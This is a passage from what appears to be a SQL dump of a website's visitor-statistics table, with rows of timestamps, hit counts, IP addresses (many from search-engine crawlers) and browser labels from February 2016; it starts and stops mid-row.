277,1,1,0,0,'141.8.142.50','other'),(1121,1455028279,1,1,0,0,'141.8.184.29','other'),(1122,1455028281,1,1,0,0,'141.8.184.18','other'),(1123,1455028283,1,1,0,0,'130.193.50.7','other'),(1124,1455028369,1,1,0,0,'217.69.136.206','other'),(1125,1455028461,1,1,0,0,'141.0.15.230','other'),(1126,1455028589,2,2,0,0,'200.87.46.206','other'),(1127,1455028592,1,1,0,0,'200.87.46.206','firefox'),(1128,1455028989,2,0,2,0,'68.180.229.232',''),(1129,1455029142,1,1,0,0,'62.210.215.100','chrome'),(1130,1455029361,1,0,1,0,'66.249.69.3',''),(1131,1455030276,1,0,1,0,'66.249.69.11',''),(1132,1455030509,2,2,0,0,'141.8.142.76','other'),(1133,1455030715,42,42,0,0,'82.193.127.15','other'),(1134,1455030971,1,1,0,0,'130.193.50.7','other'),(1135,1455030972,1,1,0,0,'130.193.51.26','other'),(1136,1455031027,1,1,0,0,'141.8.142.40','other'),(1137,1455031052,3,0,3,0,'68.180.229.232',''),(1138,1455031120,1,1,0,0,'66.249.91.63','other'),(1139,1455031147,1,1,0,0,'50.116.16.218','chrome'),(1140,1455031358,2,0,2,0,'66.249.69.3',''),(1141,1455031422,2,2,0,0,'46.165.197.142','other'),(1142,1455031529,1,0,1,0,'66.249.69.124',''),(1143,1455031661,1,1,0,0,'213.174.7.17','chrome'),(1144,1455031807,1,1,0,0,'157.55.39.107','other'),(1145,1455032560,5,0,5,0,'66.249.69.3',''),(1146,1455032579,22,0,22,0,'66.249.69.124',''),(1147,1455032596,1,0,1,0,'66.249.75.93',''),(1148,1455032607,5,0,5,0,'66.249.75.77',''),(1149,1455032737,4,4,0,0,'178.154.189.17','other'),(1150,1455032741,2,2,0,0,'130.193.37.18','other'),(1151,1455032745,1,1,0,0,'130.193.51.29','other'),(1152,1455032754,2,2,0,0,'141.8.132.45','other'),(1153,1455032758,2,2,0,0,'141.8.132.10','other'),(1154,1455032763,2,2,0,0,'5.255.253.99','other'),(1155,1455032768,3,3,0,0,'141.8.184.18','other'),(1156,1455033107,1,1,0,0,'5.255.253.95','other'),(1157,1455033111,2,2,0,0,'141.8.142.35','other'),(1158,1455033483,1,1,0,0,'217.69.136.205','other'),(1159,1455033590,1,1,0,0,'46.201.227.188','firefox'),(1160,1455033772,1,0,1,0,'66.249.75.77',''),(1161,1455033794,4,0,4,0,'66.249.69.3',''),(1162,1455033797,6,0,6,0,'66.249.69.124',''),(1163,1455033798,4,0,4,0,'66.249.75.85',''),(1164,1455033801,1,1,0,0,'213.174.7.23','firefox'),(1165,1455034044,1,1,0,0,'176.77.36.254','msie'),(1166,1455034049,1,1,0,0,'37.204.55.52','msie'),(1167,1455034050,1,1,0,0,'188.244.46.138','msie'),(1168,1455034055,1,1,0,0,'37.204.96.208','msie'),(1169,1455034058,1,1,0,0,'176.77.4.140','msie'),(1170,1455034498,1,0,1,0,'68.180.229.232',''),(1171,1455034959,2,0,2,0,'66.249.69.3',''),(1172,1455035029,3,0,3,0,'66.249.69.11',''),(1173,1455035115,1,0,1,0,'66.249.75.93',''),(1174,1455035166,3,3,0,0,'141.8.132.45','other'),(1175,1455035170,3,3,0,0,'141.8.132.10','other'),(1176,1455035174,1,1,0,0,'141.8.184.18','other'),(1177,1455035179,1,1,0,0,'5.255.253.99','other'),(1178,1455035183,5,5,0,0,'5.255.253.95','other'),(1179,1455035189,3,0,3,0,'66.249.69.124',''),(1180,1455035212,2,2,0,0,'178.154.189.17','other'),(1181,1455036034,1,1,0,0,'213.174.7.150','chrome'),(1182,1455036122,1,1,0,0,'40.77.167.19','other'),(1183,1455036270,1,0,1,0,'66.249.69.11',''),(1184,1455036384,2,0,2,0,'66.249.69.3',''),(1185,1455036821,1,1,0,0,'141.8.184.18','other'),(1186,1455037441,2,0,2,0,'66.249.69.3',''),(1187,1455037610,2,0,2,0,'66.249.69.124',''),(1188,1455037785,1,1,0,0,'5.255.253.95','other'),(1189,1455037793,1,1,0,0,'141.8.132.10','other'),(1190,1455038044,1,1,0,0,'213.174.7.150','chrome'),(1191,1455038130,1,1,0,0,'194.44.31.194','msie'),(1192,1455038363,1,1,0,0,'8.29.198.25','other'),(1193,1455038456,1,0,1,0,'66.249.69.3',''),(1194,1455038738,1,1,0,0,'178.93.150.200','firefox'),(1195,1455038769,2,0,2,0,'66.249.69.124',''),(1196,1455039077,1,1,0,0,'94.179.88.206','chrome'),(1197,1455039401,2,0,2,0,'66.249.69.3',''),(1198,1455039417,1,1,0,0,'66.102.9.94','firefox'),(1199,1455039748,1,0,1,0,'66.249.69.11',''),(1200,1455039860,1,1,0,0,'91.196.178.34','firefox'),(1201,1455040043,1,0,1,0,'68.180.229.232',''),(1202,1455040137,1,1,0,0,'5.255.253.95','other'),(1203,1455040219,1,0,1,0,'66.249.69.124',''),(1204,1455041433,1,0,1,0,'68.180.229.232',''),(1205,1455041767,1,0,1,0,'66.249.69.124',''),(1206,1455042011,1,1,0,0,'66.249.91.8','other'),(1207,1455042017,1,1,0,0,'178.154.189.17','other'),(1208,1455042021,1,1,0,0,'141.8.132.34','other'),(1209,1455042025,1,1,0,0,'141.8.184.18','other'),(1210,1455042029,1,1,0,0,'5.255.253.30','other'),(1211,1455042034,1,1,0,0,'141.8.132.10','other'),(1212,1455042038,1,1,0,0,'93.158.152.75','other'),(1213,1455042042,1,1,0,0,'141.8.142.50','other'),(1214,1455042046,1,1,0,0,'141.8.142.12','other'),(1215,1455043018,1,1,0,0,'193.194.127.217','firefox'),(1216,1455043662,1,0,1,0,'66.249.69.3',''),(1217,1455044452,2,2,0,0,'200.87.46.206','other'),(1218,1455044459,1,1,0,0,'200.87.46.206','firefox'),(1219,1455044462,1,1,0,0,'212.113.42.6','chrome'),(1220,1455045095,1,1,0,0,'5.255.253.95','other'),(1221,1455045100,1,1,0,0,'5.255.253.124','other'),(1222,1455045334,1,0,1,0,'66.249.69.124',''),(1223,1455045591,1,1,0,0,'141.8.184.18','other'),(1224,1455045905,1,1,0,0,'37.54.114.56','firefox'),(1225,1455046187,2,0,2,0,'66.249.69.11',''),(1226,1455046236,2,0,2,0,'66.249.69.124',''),(1227,1455046249,2,2,0,0,'93.126.74.44','other'),(1228,1455047136,2,2,0,0,'95.213.141.126','opera'),(1229,1455047259,1,1,0,0,'141.8.132.52','other'),(1230,1455047309,2,0,2,0,'68.180.229.232',''),(1231,1455048979,1,0,1,0,'68.180.229.232',''),(1232,1455049188,1,1,0,0,'8.29.198.26','other'),(1233,1455049394,1,0,1,0,'66.249.69.3',''),(1234,1455050299,1,1,0,0,'62.210.215.100','chrome'),(1235,1455050391,1,0,1,0,'66.249.69.102',''),(1236,1455050612,2,0,2,0,'66.249.69.11',''),(1237,1455050659,1,1,0,0,'157.55.39.107','other'),(1238,1455050739,2,2,0,0,'93.72.235.0','firefox'),(1239,1455050775,1,1,0,0,'141.8.184.18','other'),(1240,1455051604,2,2,0,0,'80.91.162.99','other'),(1241,1455051917,38,38,0,0,'82.193.127.15','other'),(1242,1455052278,1,0,1,0,'66.249.69.110',''),(1243,1455052818,185,185,0,0,'82.193.127.15','other'),(1244,1455053380,1,1,0,0,'66.249.91.4','other'),(1245,1455053533,5,5,0,0,'141.8.184.18','other'),(1246,1455053537,4,4,0,0,'5.255.253.95','other'),(1247,1455053641,1,1,0,0,'95.132.89.245','firefox'),(1248,1455054357,1,1,0,0,'180.76.15.142','other'),(1249,1455054462,1,0,1,0,'66.249.69.3',''),(1250,1455054483,4,4,0,0,'80.91.162.99','other'),(1251,1455055900,1,1,0,0,'217.69.136.209','other'),(1252,1455056321,1,1,0,0,'157.55.39.107','other'),(1253,1455056397,1,0,1,0,'66.249.69.3',''),(1254,1455056564,1,1,0,0,'141.8.184.18','other'),(1255,1455057761,2,0,2,0,'66.249.69.11',''),(1256,1455058403,1,1,0,0,'141.8.184.18','other'),(1257,1455058409,1,0,1,0,'66.249.69.124',''),(1258,1455058425,1,1,0,0,'5.255.253.95','other'),(1259,1455058492,2,0,2,0,'66.249.69.3',''),(1260,1455059762,2,0,2,0,'66.249.69.124',''),(1261,1455059855,1,1,0,0,'157.55.39.212','other'),(1262,1455059893,1,0,1,0,'66.249.69.3',''),(1263,1455059996,1,1,0,0,'8.29.198.25','other'),(1264,1455060400,1,1,0,0,'93.158.152.14','other'),(1265,1455060404,1,1,0,0,'93.158.152.58','other'),(1266,1455060408,1,1,0,0,'5.255.253.80','other'),(1267,1455060412,2,2,0,0,'5.255.253.86','other'),(1268,1455060416,2,2,0,0,'130.193.51.66','other'),(1269,1455060421,1,1,0,0,'5.255.253.99','other'),(1270,1455060630,2,0,2,0,'66.249.69.11',''),(1271,1455061875,1,0,1,0,'66.249.69.3',''),(1272,1455062630,1,1,0,0,'62.210.215.100','chrome'),(1273,1455062874,1,1,0,0,'141.8.184.19','other'),(1274,1455063077,2,0,2,0,'66.249.69.11',''),(1275,1455063454,1,1,0,0,'217.69.136.207','other'),(1276,1455063500,1,0,1,0,'66.249.69.110',''),(1277,1455063576,1,0,1,0,'66.249.69.124',''),(1278,1455063583,1,0,1,0,'66.249.69.3',''),(1279,1455064271,3,3,0,0,'69.30.255.138','other'),(1280,1455064620,1,1,0,0,'66.249.91.4','other'),(1281,1455064834,5,5,0,0,'80.91.162.99','other'),(1282,1455064887,1,1,0,0,'40.77.167.19','other'),(1283,1455065130,2,0,2,0,'68.180.229.232',''),(1284,1455065328,1,1,0,0,'141.8.132.101','other'),(1285,1455065653,1,0,1,0,'66.249.69.124',''),(1286,1455066026,4,4,0,0,'157.55.39.136','other'),(1287,1455066032,9,9,0,0,'207.46.13.21','other'),(1288,1455066327,2,2,0,0,'178.154.189.17','other'),(1289,1455066462,5,5,0,0,'157.55.39.179','other'),(1290,1455066754,1,1,0,0,'141.8.132.27','other'),(1291,1455066755,1,1,0,0,'141.8.183.23','other'),(1292,1455066975,1,1,0,0,'171.25.193.132','chrome'),(1293,1455067066,2,0,2,0,'66.249.69.3',''),(1294,1455067088,2,2,0,0,'5.255.253.121','other'),(1295,1455067090,1,1,0,0,'5.255.253.86','other'),(1296,1455067091,1,1,0,0,'141.8.142.40','other'),(1297,1455067092,1,1,0,0,'93.158.152.5','other'),(1299,1455067093,1,1,0,0,'5.255.253.94','other'),(1300,1455067094,1,1,0,0,'5.255.253.23','other'),(1301,1455067095,1,1,0,0,'141.8.183.22','other'),(1302,1455067096,1,1,0,0,'130.193.51.38','other'),(1303,1455067097,1,1,0,0,'5.255.253.99','other'),(1304,1455067098,1,1,0,0,'5.255.253.80','other'),(1305,1455067099,1,1,0,0,'141.8.142.50','other'),(1306,1455067131,1,1,0,0,'5.255.253.30','other'),(1307,1455067678,2,2,0,0,'93.158.152.76','other'),(1308,1455067776,1,1,0,0,'93.158.152.58','other'),(1309,1455068120,1,1,0,0,'141.8.183.22','other'),(1310,1455068165,1,0,1,0,'66.249.69.11',''),(1311,1455068370,1,1,0,0,'130.193.51.38','other'),(1312,1455068371,1,1,0,0,'141.8.183.23','other'),(1313,1455068373,1,1,0,0,'5.255.253.89','other'),(1315,1455068374,3,3,0,0,'5.255.253.99','other'),(1317,1455068375,3,3,0,0,'141.8.183.1','other'),(1318,1455068376,1,1,0,0,'93.158.152.14','other'),(1319,1455068377,1,1,0,0,'93.158.152.75','other'),(1321,1455068378,1,1,0,0,'93.158.152.47','other'),(1322,1455068379,1,1,0,0,'141.8.142.12','other'),(1323,1455068381,1,1,0,0,'5.255.253.86','other'),(1325,1455068382,2,2,0,0,'130.193.51.88','other'),(1326,1455068383,1,1,0,0,'141.8.132.45','other'),(1327,1455068384,2,2,0,0,'5.255.253.6','other'),(1328,1455068643,2,2,0,0,'5.255.253.30','other'),(1329,1455068644,2,2,0,0,'5.255.253.94','other'),(1330,1455068717,1,1,0,0,'141.8.184.19','other'),(1331,1455068741,2,2,0,0,'141.8.132.101','other'),(1333,1455068748,1,1,0,0,'5.255.253.121','other'),(1334,1455068749,1,1,0,0,'93.158.152.64','other'),(1335,1455068788,1,1,0,0,'130.193.51.59','other'),(1336,1455068790,1,1,0,0,'130.193.51.66','other'),(1337,1455068994,2,2,0,0,'77.222.56.43','other'),(1338,1455069017,1,1,0,0,'130.193.37.18','other'),(1339,1455069316,9,9,0,0,'40.77.167.19','other'),(1340,1455069332,1,0,1,0,'66.249.69.3',''),(1341,1455069824,1,0,1,0,'66.249.69.124',''),(1342,1455069852,3,3,0,0,'130.193.51.66','other'),(1343,1455070393,3,3,0,0,'141.8.132.27','other'),(1345,1455070394,3,3,0,0,'141.8.183.22','other'),(1346,1455070396,1,1,0,0,'5.255.253.121','other'),(1347,1455070398,1,1,0,0,'5.255.253.89','other'),(1349,1455070399,2,2,0,0,'141.8.183.1','other'),(1350,1455070400,2,2,0,0,'93.158.152.14','other'),(1351,1455070401,2,2,0,0,'93.158.152.64','other'),(1353,1455070402,1,1,0,0,'93.158.152.47','other'),(1354,1455070403,2,2,0,0,'5.255.253.86','other'),(1355,1455070404,2,2,0,0,'5.255.253.82','other'),(1357,1455070405,2,2,0,0,'93.158.152.76','other'),(1358,1455070406,2,2,0,0,'5.255.253.6','other'),(1359,1455070407,2,2,0,0,'141.8.142.40','other'),(1361,1455070409,2,2,0,0,'5.255.253.94','other'),(1362,1455070411,2,2,0,0,'141.8.184.19','other'),(1364,1455070414,1,1,0,0,'130.193.51.17','other'),(1366,1455070415,1,1,0,0,'5.255.253.95','other'),(1367,1455070416,1,1,0,0,'178.154.189.17','other'),(1368,1455070417,1,1,0,0,'5.255.253.99','other'),(1369,1455070419,1,1,0,0,'5.255.253.80','other'),(1370,1455070424,1,1,0,0,'5.255.253.30','other'),(1372,1455070425,1,1,0,0,'141.8.142.12','other'),(1373,1455070428,1,1,0,0,'130.193.51.88','other'),(1375,1455070429,1,1,0,0,'130.193.51.59','other'),(1376,1455070433,1,1,0,0,'5.255.253.124','other'),(1377,1455070437,1,1,0,0,'5.255.253.23','other'),(1378,1455070797,1,1,0,0,'8.29.198.25','other'),(1379,1455070886,1,1,0,0,'157.55.39.179','other'),(1380,1455071155,1,1,0,0,'213.174.7.35','chrome'),(1381,1455071727,1,1,0,0,'62.210.215.100','chrome'),(1382,1455071751,1,1,0,0,'217.69.136.209','other'),(1383,1455071924,1,1,0,0,'141.8.132.27','other'),(1384,1455071943,1,0,1,0,'66.249.69.11',''),(1385,1455072028,2,0,2,0,'66.249.69.3',''),(1386,1455072661,2,0,2,0,'68.180.229.232',''),(1387,1455072799,1,1,0,0,'157.55.39.136','other'),(1388,1455072819,1,0,1,0,'66.249.69.94',''),(1389,1455072940,299,299,0,0,'80.91.162.99','other'),(1390,1455073068,16,16,0,0,'82.193.127.15','other'),(1391,1455073262,1,1,0,0,'141.8.142.40','other'),(1392,1455074277,1,0,1,0,'66.249.69.124',''),(1393,1455074321,2,2,0,0,'178.154.189.17','other'),(1394,1455074322,1,1,0,0,'5.255.253.80','other'),(1395,1455074323,1,1,0,0,'93.158.152.47','other'),(1396,1455074324,1,1,0,0,'141.8.142.12','other'),(1397,1455074325,1,1,0,0,'130.193.51.88','other'),(1399,1455074326,1,1,0,0,'93.158.152.58','other'),(1400,1455074327,1,1,0,0,'141.8.132.27','other'),(1401,1455074355,1,1,0,0,'130.193.51.38','other'),(1403,1455074356,1,1,0,0,'5.255.253.89','other'),(1404,1455074358,1,1,0,0,'5.255.253.95','other'),(1405,1455074359,1,1,0,0,'5.255.253.99','other'),(1406,1455074432,1,1,0,0,'207.46.13.88','other'),(1407,1455074921,1,1,0,0,'66.249.91.4','other'),(1408,1455075429,1,0,1,0,'68.180.229.232',''),(1409,1455075553,2,2,0,0,'5.255.253.82','other'),(1410,1455075846,1,1,0,0,'93.158.152.47','other'),(1411,1455075855,1,1,0,0,'141.8.132.101','other'),(1412,1455075865,1,1,0,0,'141.8.132.27','other'),(1413,1455075868,1,1,0,0,'141.8.183.22','other'),(1414,1455075874,1,1,0,0,'5.255.253.121','other'),(1415,1455075878,1,1,0,0,'130.193.51.38','other'),(1416,1455075882,1,1,0,0,'5.255.253.89','other'),(1417,1455075885,1,1,0,0,'93.158.152.53','other'),(1418,1455076463,1,0,1,0,'66.249.69.11',''),(1419,1455076683,1,1,0,0,'82.145.211.203','other'),(1420,1455077444,1,0,1,0,'68.180.229.232',''),(1421,1455077757,2,0,2,0,'66.249.69.124',''),(1422,1455078201,1,1,0,0,'37.54.114.56','other'),(1423,1455078308,2,0,2,0,'66.249.69.3',''),(1424,1455078443,1,0,1,0,'68.180.229.232',''),(1425,1455079564,2,0,2,0,'66.249.69.11',''),(1426,1455079580,1,1,0,0,'130.193.51.66','other'),(1427,1455079788,2,2,0,0,'130.193.51.38','other'),(1428,1455079792,1,1,0,0,'5.255.253.95','other'),(1429,1455079796,1,1,0,0,'5.255.253.80','other'),(1430,1455079801,1,1,0,0,'5.255.253.86','other'),(1431,1455079805,1,1,0,0,'93.158.152.58','other'),(1432,1455079814,1,1,0,0,'93.158.152.14','other'),(1433,1455079818,1,1,0,0,'141.8.132.101','other'),(1434,1455079824,1,1,0,0,'141.8.132.27','other'),(1435,1455079852,1,1,0,0,'217.69.136.207','other'),(1436,1455079853,1,1,0,0,'217.69.136.204','other'),(1437,1455079866,1,0,1,0,'66.249.69.3',''),(1438,1455079993,2,2,0,0,'157.55.39.179','other'),(1439,1455080169,1,0,1,0,'66.249.69.124',''),(1440,1455080642,7,7,0,0,'80.91.162.99','other'),(1441,1455080965,2,0,2,0,'68.180.229.232',''),(1442,1455081574,1,1,0,0,'5.255.253.23','other'),(1443,1455081578,1,1,0,0,'141.8.183.22','other'),(1444,1455081583,1,1,0,0,'5.255.253.121','other'),(1445,1455081587,1,1,0,0,'141.8.183.23','other'),(1446,1455081593,1,1,0,0,'141.8.183.2','other'),(1447,1455081596,1,1,0,0,'5.255.253.95','other'),(1448,1455081600,1,1,0,0,'5.255.253.99','other'),(1449,1455081605,1,1,0,0,'5.255.253.80','other'),(1450,1455081609,1,1,0,0,'8.29.198.26','other'),(1451,1455081610,1,1,0,0,'141.8.183.1','other'),(1452,1455081614,1,1,0,0,'93.158.152.14','other'),(1453,1455082432,2,0,2,0,'68.180.229.232',''),(1454,1455082874,2,0,2,0,'66.249.69.124',''),(1455,1455082970,1,1,0,0,'188.163.74.129','chrome'),(1456,1455082984,2,0,2,0,'66.249.69.11',''),(1457,1455083386,2,0,2,0,'66.249.69.3',''),(1458,1455083991,1,0,1,0,'66.249.69.11',''),(1459,1455084142,1,1,0,0,'93.158.152.76','other'),(1460,1455084156,1,1,0,0,'66.249.81.211','firefox'),(1461,1455084782,1,0,1,0,'66.249.69.3',''),(1462,1455085011,1,1,0,0,'40.77.167.23','other'),(1463,1455085281,1,1,0,0,'66.249.91.4','other'),(1464,1455085469,1,1,0,0,'141.8.132.27','other'),(1465,1455085763,1,1,0,0,'5.255.253.86','other'),(1466,1455085859,1,1,0,0,'207.46.13.180','other'),(1467,1455085928,1,1,0,0,'94.179.2.66','firefox'),(1468,1455086324,1,0,1,0,'66.249.69.124',''),(1469,1455086501,1,1,0,0,'213.174.7.22','chrome'),(1470,1455086596,1,1,0,0,'40.77.167.23','other'),(1471,1455086727,1,1,0,0,'213.174.7.52','chrome'),(1472,1455087120,1,1,0,0,'212.111.198.100','chrome'),(1473,1455087207,1,1,0,0,'66.249.93.94','firefox'),(1474,1455087296,1,1,0,0,'207.46.13.180','other'),(1475,1455087454,1,1,0,0,'213.174.7.22','chrome'),(1476,1455088045,2,0,2,0,'66.249.69.3',''),(1477,1455088070,1,1,0,0,'178.154.189.17','other'),(1478,1455088174,1,1,0,0,'213.174.7.52','chrome'),(1479,1455088216,3,0,3,0,'66.249.69.124',''),(1480,1455088271,1,0,1,0,'66.249.69.102',''),(1481,1455088883,4,4,0,0,'128.199.47.96','other'),(1482,1455088983,2,0,2,0,'66.249.69.3',''),(1483,1455089053,1,0,1,0,'66.249.69.11',''),(1484,1455089535,1,1,0,0,'130.193.51.66','other'),(1485,1455089539,1,1,0,0,'178.154.189.17','other'),(1486,1455089608,1,0,1,0,'68.180.229.232',''),(1487,1455089758,1,1,0,0,'213.174.7.22','chrome'),(1488,1455089914,1,0,1,0,'66.249.69.3',''),(1489,1455089935,1,1,0,0,'66.249.93.86','firefox'),(1490,1455090371,2,0,2,0,'66.249.69.124',''),(1491,1455090586,1,1,0,0,'213.174.7.38','firefox'),(1492,1455090587,1,1,0,0,'91.196.177.90','chrome'),(1493,1455090669,1,0,1,0,'68.180.229.232',''),(1494,1455090818,1,1,0,0,'93.158.152.47','other'),(1495,1455090968,1,1,0,0,'157.55.39.145','other'),(1496,1455091084,1,0,1,0,'207.46.13.180',''),(1497,1455091307,1,1,0,0,'78.111.186.180','chrome'),(1498,1455091665,1,1,0,0,'207.46.13.180','other'),(1499,1455092364,1,1,0,0,'62.210.215.100','chrome'),(1500,1455092430,1,1,0,0,'8.29.198.26','other'),(1501,1455092432,2,0,2,0,'68.180.229.232',''),(1502,1455092568,1,1,0,0,'217.69.136.209','other'),(1503,1455092697,1,0,1,0,'66.249.69.11',''),(1504,1455093443,1,1,0,0,'141.8.132.27','other'),(1505,1455093447,1,1,0,0,'141.8.184.19','other'),(1506,1455093452,1,1,0,0,'141.8.183.22','other'),(1507,1455093719,1,1,0,0,'93.158.152.58','other'),(1508,1455093723,1,1,0,0,'5.255.253.121','other'),(1509,1455093799,1,1,0,0,'37.54.18.63','chrome'),(1510,1455093930,1,0,1,0,'66.249.69.124',''),(1511,1455093963,1,0,1,0,'68.180.229.232',''),(1512,1455094359,1,1,0,0,'213.174.7.19','chrome'),(1513,1455094370,1,1,0,0,'91.124.60.237','chrome'),(1514,1455094667,1,0,1,0,'66.249.69.11',''),(1515,1455094860,2,0,2,0,'66.249.69.124',''),(1516,1455095126,1,1,0,0,'62.210.215.100','chrome'),(1517,1455095442,1,0,1,0,'66.249.69.3',''),(1518,1455095508,1,0,1,0,'68.180.229.232',''),(1519,1455095550,1,1,0,0,'66.249.91.63','other'),(1520,1455095877,1,1,0,0,'5.255.253.86','other'),(1521,1455096644,1,0,1,0,'66.249.69.124',''),(1522,1455097393,1,1,0,0,'207.46.13.180','other'),(1523,1455097566,1,1,0,0,'5.255.253.103','other'),(1524,1455097571,1,1,0,0,'130.193.51.29','other'),(1525,1455097575,1,1,0,0,'93.158.152.8','other'),(1526,1455097579,1,1,0,0,'178.154.189.17','other'),(1527,1455097583,1,1,0,0,'93.158.152.5','other'),(1528,1455097588,1,1,0,0,'141.8.132.52','other'),(1529,1455097900,1,1,0,0,'95.158.62.244','chrome'),(1530,1455098045,1,1,0,0,'78.111.190.4','firefox'),(1531,1455098048,1,0,1,0,'68.180.229.232',''),(1532,1455098150,1,1,0,0,'180.76.15.156','other'),(1533,1455098306,1,1,0,0,'141.8.184.18','other'),(1534,1455098435,1,0,1,0,'66.249.69.3',''),(1535,1455098732,1,1,0,0,'157.55.39.149','other'),(1536,1455099317,1,1,0,0,'213.174.7.52','chrome'),(1537,1455099499,1,1,0,0,'80.78.41.154','chrome'),(1538,1455099682,2,2,0,0,'141.8.184.18','other'),(1539,1455099687,1,1,0,0,'5.255.253.95','other'),(1540,1455099691,3,3,0,0,'178.154.189.17','other'),(1541,1455099697,2,2,0,0,'94.179.72.87','chrome'),(1542,1455099756,1,0,1,0,'68.180.229.232',''),(1543,1455100238,1,1,0,0,'157.55.39.179','other'),(1544,1455100405,1,1,0,0,'80.78.41.154','chrome'),(1545,1455100424,2,2,0,0,'200.87.46.206','other'),(1546,1455100426,1,1,0,0,'200.87.46.206','firefox'),(1547,1455100436,1,1,0,0,'40.77.167.23','other'),(1548,1455100950,1,0,1,0,'66.249.69.94',''),(1549,1455101341,1,1,0,0,'91.200.12.136','chrome'),(1550,1455101491,6,6,0,0,'109.87.138.56','other'),(1551,1455101620,1,1,0,0,'5.255.253.95','other'),(1552,1455101682,1,1,0,0,'91.200.12.143','chrome'),(1553,1455101906,1,1,0,0,'217.20.182.229','chrome'),(1554,1455101970,1,1,0,0,'217.69.136.207','other'),(1555,1455102057,1,0,1,0,'68.180.229.232',''),(1556,1455102239,1,1,0,0,'91.200.12.136','firefox'),(1557,1455102417,14,14,0,0,'141.8.184.18','other'),(1558,1455102440,1,0,1,0,'66.249.69.11',''),(1559,1455102608,1,1,0,0,'91.200.12.143','firefox'),(1560,1455102619,1,1,0,0,'94.179.66.26','firefox'),(1561,1455102682,1,1,0,0,'101.226.167.222','chrome'),(1562,1455102717,1,1,0,0,'178.154.189.17','other'),(1563,1455102950,1,1,0,0,'92.60.186.121','other'),(1564,1455102983,2,0,2,0,'66.249.69.124',''),(1565,1455103149,2,2,0,0,'93.74.206.122','other'),(1566,1455103255,1,1,0,0,'8.29.198.26','other'),(1567,1455103623,1,1,0,0,'182.118.21.224','msie'),(1568,1455103735,2,0,2,0,'66.249.69.11',''),(1569,1455104219,1,1,0,0,'157.55.39.179','other'),(1570,1455104356,1,0,1,0,'66.249.69.3',''),(1571,1455104473,6,6,0,0,'141.8.184.18','other'),(1572,1455104495,1,1,0,0,'217.69.136.205','other'),(1573,1455104647,1,1,0,0,'213.174.7.17','firefox'),(1574,1455104950,1,1,0,0,'213.174.7.21','firefox'),(1575,1455105019,2,0,2,0,'68.180.229.232',''),(1576,1455105136,1,0,1,0,'66.249.69.124',''),(1577,1455105635,1,1,0,0,'93.74.206.122','other'),(1579,1455105701,1,1,0,0,'91.196.178.39','chrome'),(1580,1455106000,1,0,1,0,'66.249.69.43',''),(1581,1455106018,1,1,0,0,'180.76.15.158','other'),(1582,1455106312,1,0,1,0,'66.249.69.51',''),(1583,1455106387,2,0,2,0,'66.249.69.124',''),(1584,1455106419,1,1,0,0,'157.55.39.179','other'),(1585,1455106460,1,1,0,0,'66.249.91.24','other'),(1586,1455107205,1,1,0,0,'149.202.54.34','other'),(1587,1455107273,1,0,1,0,'66.249.69.3',''),(1588,1455107374,2,2,0,0,'178.154.189.17','other'),(1589,1455107774,1,0,1,0,'66.249.69.124',''),(1590,1455107944,1,1,0,0,'157.55.39.179','other'),(1591,1455108108,1,0,1,0,'66.249.69.35',''),(1592,1455108124,1,0,1,0,'66.249.69.43',''),(1593,1455108178,2,2,0,0,'141.8.184.18','other'),(1594,1455109150,34,34,0,0,'141.8.184.18','other'),(1595,1455109163,17,17,0,0,'5.255.253.95','other'),(1596,1455109188,1,1,0,0,'178.154.189.17','other'),(1597,1455109192,3,3,0,0,'5.255.253.99','other'),(1598,1455110274,1,1,0,0,'178.92.74.235','firefox'),(1599,1455110654,1,0,1,0,'66.249.69.3',''),(1600,1455110685,1,1,0,0,'94.179.109.118','firefox'),(1601,1455110729,1,0,1,0,'66.249.69.102',''),(1602,1455110828,3,3,0,0,'141.8.184.18','other'),(1603,1455110963,1,0,1,0,'68.180.229.232',''),(1604,1455111596,1,1,0,0,'37.9.122.201','other'),(1605,1455111634,1,1,0,0,'213.160.158.70','chrome'),(1606,1455111645,1,1,0,0,'5.255.253.95','other'),(1607,1455111646,1,1,0,0,'141.8.132.10','other'),(1608,1455111647,2,2,0,0,'141.8.132.45','other'),(1609,1455111962,1,1,0,0,'217.69.136.207','other'),(1610,1455112026,2,0,2,0,'66.249.69.124',''),(1611,1455112067,2,2,0,0,'93.74.206.122','other'),(1612,1455112318,2,0,2,0,'68.180.229.232',''),(1613,1455112417,1,1,0,0,'85.115.62.180','other'),(1614,1455112444,1,1,0,0,'107.21.1.8','other'),(1615,1455112467,1,1,0,0,'94.179.97.81','firefox'),(1616,1455112563,2,0,2,0,'66.249.69.11',''),(1617,1455112740,1,1,0,0,'213.174.7.19','firefox'),(1618,1455112779,11,11,0,0,'40.77.167.38','other'),(1619,1455112789,8,8,0,0,'157.55.39.179','other'),(1620,1455112811,7,7,0,0,'207.46.13.180','other'),(1621,1455112954,1,1,0,0,'213.160.158.70','chrome'),(1622,1455112956,1,1,0,0,'141.8.184.18','other'),(1623,1455113064,1,0,1,0,'66.249.69.124',''),(1624,1455113065,1,1,0,0,'91.196.178.39','chrome'),(1625,1455113362,1,1,0,0,'46.149.86.76','chrome'),(1626,1455113735,1,1,0,0,'213.174.7.17','firefox'),(1627,1455114089,1,1,0,0,'8.29.198.26','other'),(1628,1455114118,4,0,4,0,'68.180.229.232',''),(1629,1455114378,2,2,0,0,'178.154.189.17','other'),(1631,1455114380,1,1,0,0,'141.8.184.18','other'),(1633,1455114381,1,1,0,0,'141.8.142.35','other'),(1634,1455114383,1,1,0,0,'5.255.253.95','other'),(1635,1455114459,1,1,0,0,'91.196.178.11','chrome'),(1636,1455115082,24,24,0,0,'80.91.162.99','other'),(1637,1455115152,1,0,1,0,'66.249.69.3',''),(1638,1455115279,1,0,1,0,'66.249.69.110',''),(1639,1455115785,1,0,1,0,'66.249.69.11',''),(1640,1455115846,1,0,1,0,'68.180.229.232',''),(1641,1455115894,1,1,0,0,'40.77.167.38','other'),(1642,1455116062,1,1,0,0,'213.174.7.17','firefox'),(1643,1455116151,1,1,0,0,'180.76.15.163','other'),(1644,1455116292,1,0,1,0,'66.249.69.3',''),(1645,1455116298,1,1,0,0,'204.13.201.138','msie'),(1646,1455116299,1,1,0,0,'46.166.190.144','msie'),(1647,1455116460,3,3,0,0,'141.8.132.10','other'),(1648,1455116462,4,4,0,0,'141.8.184.18','other'),(1649,1455116464,2,2,0,0,'141.8.142.35','other'),(1650,1455116467,2,2,0,0,'141.8.132.45','other'),(1651,1455116468,1,1,0,0,'5.255.253.95','other'),(1652,1455116471,1,1,0,0,'5.255.253.99','other'),(1653,1455116472,1,1,0,0,'178.154.189.17','other'),(1654,1455117386,1,1,0,0,'150.70.173.58','msie'),(1655,1455117828,1,1,0,0,'213.174.7.33','firefox'),(1656,1455117844,1,1,0,0,'66.249.